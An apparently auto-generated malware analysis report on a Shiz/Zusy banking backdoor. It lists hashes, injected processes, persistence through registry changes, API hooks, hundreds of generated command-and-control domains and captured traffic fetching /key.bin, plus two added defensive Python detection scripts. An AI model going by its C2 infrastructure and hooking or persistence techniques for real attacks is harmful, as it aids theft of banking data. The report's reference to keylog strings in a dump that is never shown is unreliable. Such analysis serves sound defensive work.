Gen.Variant.Zusy.Elzob.8654_bcf3331a73

by malwarelabrobot on November 2nd, 2017 in Malware Descriptions.

HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Variant.Zusy.Elzob.8654 (B) (Emsisoft), Gen:Variant.Zusy.Elzob.8654 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: bcf3331a7355038fb176d96dc6553ee4
SHA1: adc0defbfda118893eccfda0f4a53c5482eee3a6
SHA256: c072505ce98217f83b5b79bd12c4dcda660fe4aef31fc12e7ef06914b659faa4
SSDeep: 6144:eu kBmWicfSPyXTnkl r MHLt8TaggWQI9T1S0osk:eAmWip2TnGC MHL2mgiIF1S0
Size: 366080 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-10-01 20:32:05
Analyzed on: Windows7 SP1 32-bit


Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2512

The Trojan injects its code into the following process(es):

winlogon.exe:416
svchost.exe:580
svchost.exe:648
svchost.exe:700
svchost.exe:824
svchost.exe:864
taskhost.exe:872
svchost.exe:1048
svchost.exe:1156
svchost.exe:1280
Dwm.exe:1376
Explorer.EXE:1440
svchost.exe:1732
TPAutoConnect.exe:2160
conhost.exe:2168
svchost.exe:2560
conhost.exe:3956

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes)
C:\Windows\System32\config\SOFTWARE (13651 bytes)
C:\Windows (4 bytes)
C:\Windows\AppPatch\xodaql.exe (2837 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\584E.tmp (0 bytes)

Registry activity

The process %original file name%.exe:2512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"10f5f7ed" = "YM3&}=—ZîÚ¹ªáZ dnÓj?—[üþ{ò:Ã’ 㬓š²©#ú;³³Ñšqr{¬´3A#jÆ’2r Ù9².²Ãt‚¾súžÂ2¡D’*ŒÛDö¶¬ƒj~ž2›©š’ ’î#nN¬dLRÛ«j¢avÜd~›Å Cò6ÂË‹S±ãR«9±iù,©ÖŠÉŠÁV‚B‚Žž¹êÊ~Ê|[뺛AC‹ùéì>aÆâ‘¤Ù{²âƒi ™ÒRKf‹¾ûÌúB™Š‚cN¾;ğÁÑDZ©4Fd1“[ŒËʱù«i A’ãƒjË ‰†üÓásñQ."

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ose00000.exe, , \??\C:\Windows\apppatch\xodaql.exe_, \??\C:\Windows\apppatch\xodaql.exe"
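The PendingFileRenameOperations value above is a REG_MULTI_SZ of source/target pairs that Session Manager (smss.exe) processes at the next boot; an empty target means "delete the source". Read that way, the sample schedules the removal of ose00000.exe from %TEMP% and the rename of xodaql.exe_ to xodaql.exe inside C:\Windows\AppPatch. The Python below is added for this write-up and is not part of the Lavasoft report: it decodes the value as the report prints it (pairs joined with ", ") into rename/delete operations and flags executables staged into, or cleaned out of, a system or temp directory. The staging-directory list, the suffix list and the %CurrentUserName% placeholder are assumptions of the example.

```python
"""Added example for this report (not Lavasoft's code): decode a
PendingFileRenameOperations value into the rename/delete operations scheduled
for the next boot and flag the ones that stage or clean up executables."""
from dataclasses import dataclass
from typing import List, Optional

# Reconstructed from the registry value in the report. The report joins the
# REG_MULTI_SZ elements with ", "; the user name is the report's placeholder.
REPORT_VALUE = (r"\??\C:\Users\%CurrentUserName%\AppData\Local\Temp\ose00000.exe, , "
                r"\??\C:\Windows\apppatch\xodaql.exe_, \??\C:\Windows\apppatch\xodaql.exe")

# Assumed lists: directories malware commonly stages into, and suffixes of interest.
STAGING_DIRS = (r"\windows\apppatch", r"\appdata\local\temp", r"\windows\system32", r"\windows\temp")
EXECUTABLE_SUFFIXES = (".exe", ".exe_", ".dll", ".sys", ".tmp")


@dataclass
class PendingOp:
    action: str            # "delete" (empty target) or "rename"
    source: str
    target: Optional[str]


def split_report_value(text: str) -> List[str]:
    """Undo the report's ', ' join; an empty element is a genuine empty string."""
    return [part.strip() for part in text.split(", ")]


def strip_nt_prefix(path: str) -> str:
    """Session Manager stores NT object paths (\\??\\C:\\...); drop the prefix."""
    return path[4:] if path.startswith("\\??\\") else path


def parse_pending_ops(multi_sz: List[str]) -> List[PendingOp]:
    """The value is a flat list of source/target pairs. MoveFileEx with
    MOVEFILE_DELAY_UNTIL_REBOOT and a NULL target writes an empty string,
    which smss.exe interprets as 'delete source' at boot."""
    if len(multi_sz) % 2:
        raise ValueError("PendingFileRenameOperations must contain source/target pairs")
    ops = []
    for src, dst in zip(multi_sz[0::2], multi_sz[1::2]):
        src, dst = strip_nt_prefix(src), strip_nt_prefix(dst)
        ops.append(PendingOp("delete", src, None) if dst == "" else PendingOp("rename", src, dst))
    return ops


def is_suspicious(op: PendingOp) -> bool:
    """Executable content moved into, or removed from, a staging/system directory."""
    for path in filter(None, (op.source, op.target)):
        low = path.lower()
        if low.endswith(EXECUTABLE_SUFFIXES) and any(d in low for d in STAGING_DIRS):
            return True
    return False


def triage(text: str) -> List[PendingOp]:
    """Suspicious operations from a value in the report's ', '-joined form."""
    return [op for op in parse_pending_ops(split_report_value(text)) if is_suspicious(op)]


if __name__ == "__main__":
    for op in triage(REPORT_VALUE):
        print(f"{op.action:6} {op.source} -> {op.target or '(deleted at boot)'}")
```

On a live host the same value is read with `winreg` from HKLM\System\CurrentControlSet\Control\Session Manager; the ", " split is only needed for the report's flattened rendering. Note that the value is consumed and cleared by Session Manager, so it is only visible between the infection and the next reboot.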

Dropped PE files

MD5 File path
05a61fd86e6c6be4ba25eb7bc7711e22 c:\Windows\AppPatch\xodaql.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
GetMessageW
TranslateMessage
GetMessageA
SetThreadDesktop

The Trojan installs the following user-mode hooks in ntdll.dll:

ZwQuerySystemInformation
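Hooks on GetMessageA/W and TranslateMessage are the usual user-mode keystroke-capture points, GetClipboardData serves clipboard theft, and a hook on ZwQuerySystemInformation is the standard user-mode way to filter the sample's own processes out of enumeration; the keylog.txt and keygrab strings in the dump below fit that picture. The Python below is added here and is not from the report or the Lavasoft system: it shows the check a responder would run for such hooks, comparing an export's entry bytes in the target process with the clean bytes of the same export on disk and, when they differ, decoding the trampoline to see whether control leaves the module. The user32.dll mapping, the export address and the prologue bytes are constructed; the injected-region address is the winlogon.exe RWX region named in the dump header below (0x00B40000, 0xAA000 bytes).

```python
"""Added example (not from the report): recognise an inline user-mode hook of
the kind listed under Rootkit activity by comparing an export's entry bytes in
memory with the clean bytes from the DLL on disk. Addresses and byte strings
are constructed; on a live system the in-memory bytes come from
ReadProcessMemory and the on-disk bytes from the export's file offset."""
import struct
from typing import Optional, Tuple

# Constructed layout: a hypothetical user32.dll mapping and the RWX region the
# report shows the sample injecting into winlogon.exe.
USER32_BASE, USER32_SIZE = 0x77D10000, 0x000C0000
GETMESSAGEW_VA = USER32_BASE + 0x11100
INJECTED_BASE, INJECTED_SIZE = 0x00B40000, 0x000AA000
HOOK_TARGET = INJECTED_BASE + 0x1000

# Typical hot-patchable x86 prologue: mov edi,edi; push ebp; mov ebp,esp; sub esp,0x10
CLEAN_PROLOGUE = bytes.fromhex("8bff558bec83ec10")
# The same entry after a 5-byte "jmp rel32" to the injected region was written over it.
HOOKED_PROLOGUE = b"\xE9" + struct.pack("<i", HOOK_TARGET - (GETMESSAGEW_VA + 5)) + CLEAN_PROLOGUE[5:]


def decode_entry_redirect(code: bytes, va: int) -> Optional[Tuple[str, int]]:
    """Target of a control-flow redirect at the function entry, or None.
    Covers the three trampolines user-mode hookers use on x86:
    E9 rel32 (jmp), FF 25 disp32 (jmp dword ptr [abs]) and 68 imm32 / C3 (push; ret)."""
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp", (va + 5 + rel) & 0xFFFFFFFF
    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x25:
        return "jmp_indirect", struct.unpack_from("<I", code, 2)[0]
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    return None


def check_export(name: str, disk: bytes, memory: bytes, va: int,
                 module_lo: int, module_hi: int) -> dict:
    """Compare the first bytes; if they differ, decode where control now goes
    and whether that target lies outside the legitimate module image."""
    if disk[:8] == memory[:8]:
        return {"export": name, "hooked": False, "redirect": None, "target_outside_module": False}
    redirect = decode_entry_redirect(memory, va)
    outside = redirect is not None and not (module_lo <= redirect[1] < module_hi)
    return {"export": name, "hooked": True, "redirect": redirect, "target_outside_module": outside}


def in_injected_region(addr: int) -> bool:
    """True when the redirect lands in the RWX region from the dump header."""
    return INJECTED_BASE <= addr < INJECTED_BASE + INJECTED_SIZE


if __name__ == "__main__":
    print(check_export("USER32!GetMessageW", CLEAN_PROLOGUE, HOOKED_PROLOGUE,
                       GETMESSAGEW_VA, USER32_BASE, USER32_BASE + USER32_SIZE))
```

Two caveats for a real comparison: apply the DLL's relocations to the on-disk bytes before diffing (or compare only the first bytes of hot-patchable prologues, which contain no relocated operands), and expect legitimate hooks from security products in the same places; the decisive signal is a redirect into a region that belongs to no loaded module, as here.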

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             10772         11264     4.1629   fc0cd423f3f881a1185bb93dc30c0ae4
.rdata  16384            6854          7168      4.09717  526aed65adee6062a4e8fcd112ec97d5
.data   24576            358948        344064    4.69085  3a9bf21e68fab6de8397ac481ecc0134
.reloc  385024           2426          2560      2.26235  d1f6091abe33d1cf8411d933a5d13ecc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 3
b592848c6a8ae7b2fdca9bae1953384c
b9c91e6e540274fb4c32e2359947f11a
b39ea4f79232adb9949bb61cee025813

URLs

URL IP
hxxp://dixoxywy.info/key.bin 23.253.126.58
hxxp://jevijexi.info/key.bin 198.54.117.212
hxxp://wycokolo.info/key.bin 141.8.224.93
hxxp://zyrivuro.info/key.bin 23.253.126.58
hxxp://qekenivo.info/key.bin 23.253.126.58
hxxp://naselyfu.info/key.bin 23.253.126.58
hxxp://rydofale.info/key.bin 23.253.126.58
hxxp://rycikoga.info/key.bin 23.253.126.58
hxxp://xuxelixi.info/key.bin 23.253.126.58
hxxp://xudohijy.info/key.bin 23.253.126.58
hxxp://mavagyte.info/key.bin 23.253.126.58
hxxp://sivydubu.info/key.bin 23.253.126.58
hxxp://wekanila.info/key.bin 23.253.126.58
hxxp://zubisoda.info/key.bin 23.253.126.58
hxxp://nofipymo.info/key.bin 141.8.224.93
hxxp://mamawufo.info/key.bin 23.253.126.58
hxxp://rycukope.info/key.bin 23.253.126.58
hxxp://halybowu.info/key.bin 23.253.126.58
hxxp://xubusore.info/key.bin 141.8.224.93
hxxp://viwemata.info/key.bin 23.253.126.58
hxxp://fobefizi.info/key.bin 23.253.126.58
hxxp://kericura.info/key.bin 23.253.126.58
dns.msftncsi.com 131.107.255.255
www.microsoft.com 2.18.76.98
maraxiku.info
fogytibo.info
cinidofo.info
zybasixi.info
dokovoza.info
magisumi.info
jejemyje.info
cilicaco.info
najubumi.info
golevobi.info
hacyhasa.info
navegyfa.info
sigutiwi.info
viluceka.info
fokyvowu.info
xuhyroru.info
lyzeluxi.info
kejimyni.info
gacehawy.info
gacohabu.info
cinydota.info
zuxiliry.info
sizaxyse.info
lyzulunu.info
wyticogu.info
rynopavu.info
bovagyte.info
bopaketo.info
tuwybegi.info
gaquqoso.info
fokuvosy.info
dimemiby.info
vipukeky.info
puzazypy.info
jenoryre.info
zugiwoje.info
rywibevy.info
ryhuqela.info
gatazabe.info
tyfegaqo.info
www.bing.com
bozuceko.info
hapyzasi.info
bofapyfu.info
galivoha.info
kyzilury.info
dimamizu.info
foqiqiso.info
cihurafy.info
pujowevo.info
disojusi.info
zysahijy.info
sizyxyzo.info
rydufagy.info
ryhaqeqi.info
lysegixe.info
sirabyso.info
rydygapu.info
jefaderi.info
lysygina.info
hadideze.info
kefidexa.info
wydafava.info
pujuwela.info
xuqenara.info
sirybyhi.info
purubyly.info
bopilece.info
viherami.info
lykomuru.info
halubose.info
rynupago.info
makanika.info
sisajuhu.info
pupejygu.info
nagesuke.info
ryhoqevo.info
puzozyqu.info
jecejery.info
namuwume.info
fogutiwi.info
galovozo.info
tunapaqe.info
wexakovi.info
viwunafi.info
tujeqepu.info
qedufogu.info
qekuniqu.info
hanireby.info
zusihidu.info
wetexive.info
jepazana.info
lyjemyje.info
dibofusa.info
puzuxyvi.info
tujaweqi.info
marexice.info
fohatiza.info
sizexyha.info
gaqoqohi.info
fotyzasi.info
volecety.info
hanurezu.info
makybico.info
ciqaname.info
navygyki.info
puwobeqa.info
bomawufo.info
goqaqozu.info
dogitisu.info
magasufy.info
doqoqihi.info
sividuwy.info
vicugyci.info
gatozazy.info
jenyreji.info
kemutyxu.info
tunopavy.info
wetaxoly.info
kymytyji.info
disijuwo.info
foqeqoby.info
sisyjuze.info
qexukope.info
lyrevuju.info
zubosojo.info
novugycu.info
maxajoci.info
jefodeno.info
wexykoqy.info
kyjymyxo.info
sivefuzi.info
divafuho.info
lykamydy.info
xuherono.info
bofopyti.info
xuqunado.info
mamewuki.info
xudyhino.info
fokivohe.info
zuxylinu.info
kemityny.info
cilacami.info
lyxaluja.info
webypapa.info
gadadewo.info
qeroxigi.info
ciqonacy.info
xubasoxu.info
xubesony.info
boziceci.info
vipikece.info
vocygyko.info
vihyratu.info
wybapaqy.info
nomowuta.info
tynypapa.info
fotilohu.info
tulyzylo.info
dobufuwe.info
lyryvuxy.info
qekinipy.info
cilecaty.info
xudehixe.info
bopolema.info
sisujuba.info
lyrovudi.info
nafusyca.info
nopuleky.info
kyrucune.info
vopekefu.info
najibutu.info
hadodeba.info
hafydehy.info
hapezawo.info
jejamydy.info
jefededu.info
lymetydo.info
tyhyqege.info
qeqywuvy.info
gotezawo.info
citokema.info
tuzezyga.info
digetize.info
jecojenu.info
mamiwuta.info
goxyhase.info
zyxolide.info
qexojolo.info
kewacudo.info
bowomacy.info
kefydeje.info
jeneryda.info
bovigymy.info
rynipali.info
foqyqowa.info
zusuhiri.info
makonife.info
qetyxiqa.info
digotihy.info
hacuhaho.info
qequwuqe.info
jejumyxa.info
maryxima.info
hacihazi.info
sigytibo.info
teredo.ipv6.microsoft.com
qexikoga.info
zuruvuna.info
dosujuba.info
tuwabepo.info
ciwinaku.info
fobyfiby.info
puvodupe.info
qetuxipo.info
ciharoca.info
cihiroke.info
vowamame.info
cibosoki.info
bofypyke.info
wedyfopi.info
xugurody.info
hatizahu.info
bozacemu.info
kejomyru.info
puwibyve.info
bocegyfa.info
vilycefe.info
gohopihe.info
wedefoqo.info
pupojypi.info
tywubelu.info
pupijuqo.info
cidihifu.info
namywucy.info
magosutu.info


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET CNC Zeus Tracker Reported CnC Server group 4

Traffic

GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wycokolo.info


HTTP/1.1 200 OK
Date: Wed, 01 Nov 2017 17:35:03 GMT
Server: Apache
Set-Cookie: gvc=913vr2571033037526473; expires=Mon, 31-Oct-2022 17:35:03 GMT; Max-Age=157680000; path=/; domain=wycokolo.info; HttpOnly
Content-Length: 51
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: dixoxywy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xubusore.info


HTTP/1.1 200 OK
Date: Wed, 01 Nov 2017 17:35:25 GMT
Server: Apache
Set-Cookie: gvc=917vr2571033258622238; expires=Mon, 31-Oct-2022 17:35:25 GMT; Max-Age=157680000; path=/; domain=xubusore.info; HttpOnly
Content-Length: 51
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycukope.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zubisoda.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:27 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rydofale.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:02 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zubisoda.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:28 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mamawufo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:01 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halybowu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: qekenivo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: dixoxywy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rydofale.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:01 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wekanila.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: sivydubu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:29 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: naselyfu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:57 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobefizi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: viwemata.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:02 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: nofipymo.info


HTTP/1.1 200 OK
Date: Wed, 01 Nov 2017 17:35:27 GMT
Server: Apache
Set-Cookie: gvc=912vr2571033278324987; expires=Mon, 31-Oct-2022 17:35:27 GMT; Max-Age=157680000; path=/; domain=nofipymo.info; HttpOnly
Content-Length: 51
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xudohijy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kericura.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: sivydubu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:28 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobefizi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxelixi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycikoga.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xudohijy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kericura.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:35:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halybowu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wekanila.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Wed, 01 Nov 2017 17:34:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zyrivuro.info


HTTP/1.1 404 Not Found
